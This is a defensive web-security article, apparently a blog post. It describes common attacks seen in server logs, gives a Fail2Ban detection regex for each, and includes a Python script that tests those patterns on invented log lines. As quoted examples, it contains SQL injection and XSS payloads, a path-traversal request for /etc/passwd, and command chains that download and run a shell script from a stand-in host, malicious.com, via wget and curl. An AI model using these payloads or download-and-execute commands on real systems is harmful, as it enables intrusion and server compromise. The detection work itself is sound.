In the world of web security, understanding common attack vectors is essential to safeguarding websites and services. This article explores some of the most common attacks, including those frequently observed in server logs. By being aware of these attacks, administrators can take appropriate measures to protect their websites. Often, hundreds of rules are needed to cope with various attacks, and this article only provides insight into some of the common attack vectors. It is by no means a complete list of attack vectors or solutions, as there can be many different types and variations.
SQL Injection is an attack that inserts or manipulates the SQL queries a web application sends to its database. Attackers use this technique to execute unauthorized SQL commands by exploiting input fields whose values are not properly validated.
Common patterns observed:
' OR '1'='1 — This injects an always-true condition.
sleep(5) — Attempts to delay the response by executing the sleep() function.
XOR operators — Often used to manipulate query logic, e.g., ' XOR 1=1.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*['"]*(sleep\(|xor\().*HTTP/.*"
The pattern is case-sensitive and only matches a lowercase xor followed by an opening parenthesis, so the ' XOR 1=1 form shown above would not trigger it unless the alternation is broadened.
Note: This is an example and may not be “drop in code” for production environments.
Cross-Site Scripting (XSS) is an attack where malicious scripts are injected into trusted websites. These scripts can steal cookies, impersonate users, or manipulate site content.
Common XSS patterns include:
<script>alert('XSS')</script> — A simple example to trigger an alert.
<img src=x onerror=alert('XSS')> — Injecting an <img> tag with an onerror event.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(\<script\>|onerror=|javascript:).*HTTP/.*"
Access logs record the request line as the client sent it, so URL-encoded variants such as %3Cscript%3E do not match this pattern unless it is extended to cover them.
Note: This is an example and may not be “drop in code” for production environments.
Remote Code Execution (RCE) allows attackers to execute arbitrary code on the server. This type of attack often uses command chaining to run multiple commands, which can lead to full system compromise.
Examples of command chains:
cd /tmp && wget http://malicious.com/shell.sh; chmod +x shell.sh; ./shell.sh
/bin/bash -c 'curl -s http://malicious.com/some_script.sh | bash'
Attackers may use tools like wget, curl, or chmod to download and execute malicious scripts.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(wget|curl|chmod\s\+x).*HTTP/.*"
Note: This is an example and may not be “drop in code” for production environments.
Path traversal involves accessing unauthorized directories and files, often using sequences like ../ to move up through the file system.
Examples include:
GET /../../etc/passwd — Attempts to read the /etc/passwd file.
GET /bin/sh — Attempts to access a shell executable directly.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(\.\./).*HTTP/.*"
Both dots must be escaped; an unescaped dot in a regex matches any character, so \../ would also match strings such as .a/ that are not traversal sequences.
Note: This is an example and may not be “drop in code” for production environments.
Automated bots often probe websites to find vulnerabilities or exploit known ones. They may use brute-force techniques to guess credentials or scan for specific vulnerable paths.
Examples of bot activity:
GET /wp-login.php — Attempts to access WordPress login pages.
GET /admin.php — Bots attempting to access common admin panels.
A User-Agent such as python-requests/2.26.0 indicates an automated script.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*/wp-login\.php.*HTTP/.*"
Note: This is an example and may not be “drop in code” for production environments.
Many attacks target known vulnerabilities in third-party software. If a website runs software like Joomla, WordPress, or even web interfaces like OpenWrt’s LuCI, attackers will attempt to exploit them.
Examples:
GET /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php — A common exploit targeting Joomla components.
GET /autodiscover/autodiscover.json — Attempting to exploit vulnerabilities in Microsoft Exchange.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*/components/com_jnews/.*HTTP/.*"
Note: This is an example and may not be “drop in code” for production environments.
Attackers often look for files and folders that shouldn’t exist, like configuration files or outdated software paths.
Examples:
GET /.env — Attempts to access environment configuration files.
GET /wp/, GET /blog/, GET /temp/ — Probing for common directories.
The response code tells the prober whether the path exists: a 200 or 301 confirms it, whereas a path that does not exist should return a 404.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(/wp/|/blog/|/temp/).*HTTP/.*"
Only list paths that your site does not actually serve; matching /blog/ on a site that has a blog would ban legitimate visitors.
Note: This is an example and may not be “drop in code” for production environments.
DoS attacks often include making numerous requests to invalid pages, resulting in a large number of 404 responses in a short period of time. This can lead to server resource exhaustion.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*HTTP/.*".* 404
Because this pattern matches every 404 response, the jail’s maxretry and findtime settings decide how many such responses within what window are treated as abuse; set them high enough that an ordinary visitor hitting a few broken links is not banned.
Note: This is an example and may not be “drop in code” for production environments.
One of the attack types often seen in server logs involves requests containing binary data or malformed requests, which can exploit vulnerabilities in poorly configured servers or software.
Example:
GET "\x00\x0E8V\xEB\xF0\xF2>\x06\xDE\xAD\x00\x00\x00\x00\x00"
These requests are generally crafted to confuse or break the underlying software, making it behave unpredictably or exposing vulnerabilities.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*".*\\x[0-9A-Fa-f]{2}.*".*"-" "-"
This regex aims to detect and block requests containing escaped hexadecimal byte values (the web server writes non-printable bytes to the log as \xHH), which are often used for fuzzing or binary payload delivery. The <HOST> tag is required in every failregex, since it is the group Fail2Ban uses to identify the address to ban.
Note: This is an example and may not be “drop in code” for production environments.
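As an added example (not code from the article or from Fail2Ban), the following Python script applies the failregex patterns above, lightly normalized, to constructed access-log lines and emulates a jail’s maxretry and findtime logic. It assumes an IPv4-only stand-in for Fail2Ban’s <HOST> group and the combined log format; the IPs, timestamps, and request lines are invented.

```python
import re
from collections import defaultdict
from datetime import datetime

# Fail2Ban substitutes <HOST> with its own group for IPs and hostnames; this
# stand-in (an assumption for the demo, not Fail2Ban's pattern) accepts IPv4 only.
HOST_RE = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
TS_RE = re.compile(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2}) [+-]\d{4}\]")

# The article's failregex patterns, keyed by the attack class each targets.
FAILREGEXES = {
    "sqli": r'^<HOST> -.*"(GET|POST) .*[\'"]*(sleep\(|xor\().*HTTP/.*"',
    "xss": r'^<HOST> -.*"(GET|POST) .*(<script>|onerror=|javascript:).*HTTP/.*"',
    "rce": r'^<HOST> -.*"(GET|POST) .*(wget|curl|chmod\s\+x).*HTTP/.*"',
    "traversal": r'^<HOST> -.*"(GET|POST) .*(\.\./).*HTTP/.*"',
    "binary": r'^<HOST> -.*".*\\x[0-9A-Fa-f]{2}.*".*"-" "-"',
}
COMPILED = {k: re.compile(v.replace("<HOST>", HOST_RE)) for k, v in FAILREGEXES.items()}

def classify(line):
    """Return (category, host, timestamp) for the first matching failregex, else None."""
    for name, rx in COMPILED.items():
        m = rx.search(line)
        if m:
            ts = datetime.strptime(TS_RE.search(line).group(1), "%d/%b/%Y:%H:%M:%S")
            return name, m.group("host"), ts
    return None

def offenders(lines, maxretry=3, findtime=600):
    """Emulate a jail: a host is banned once it has maxretry hits within findtime seconds."""
    hits, banned = defaultdict(list), set()
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        _, host, ts = hit
        hits[host].append(ts)
        if sum(1 for t in hits[host] if (ts - t).total_seconds() <= findtime) >= maxretry:
            banned.add(host)
    return sorted(banned)

# Constructed access-log lines in combined format; IPs are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=1 and sleep(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /search?q=<script>alert(1)</script> HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /../../etc/passwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Oct/2023:13:56:00 +0000] "GET /cgi-bin/x?cmd=wget%20http://example.invalid/s.sh HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:13:56:10 +0000] "GET /blog/2023/notes.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:13:56:11 +0000] "\\x16\\x03\\x01" 400 0 "-" "-"',
]
```

With the defaults only 203.0.113.7 reaches three hits inside the window; lowering findtime to one second spreads its hits outside the window and nothing is banned, which is the same tuning trade-off the jail settings control.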
Blocking attacks is essential to maintaining the integrity and security of web services. Failing to protect a server against these common attack vectors can lead to unauthorized access, information theft, or complete service failure. In the case of DDoS-type attacks, servers can easily run out of resources, such as bandwidth, CPU, and memory, rendering them unavailable to legitimate users. Properly configured rules, such as those demonstrated here, help mitigate a wide range of attacks. However, it is important to recognize that no solution is perfect. Maintaining effective protection requires constant vigilance, updating rules, and adjusting configurations as new threats emerge.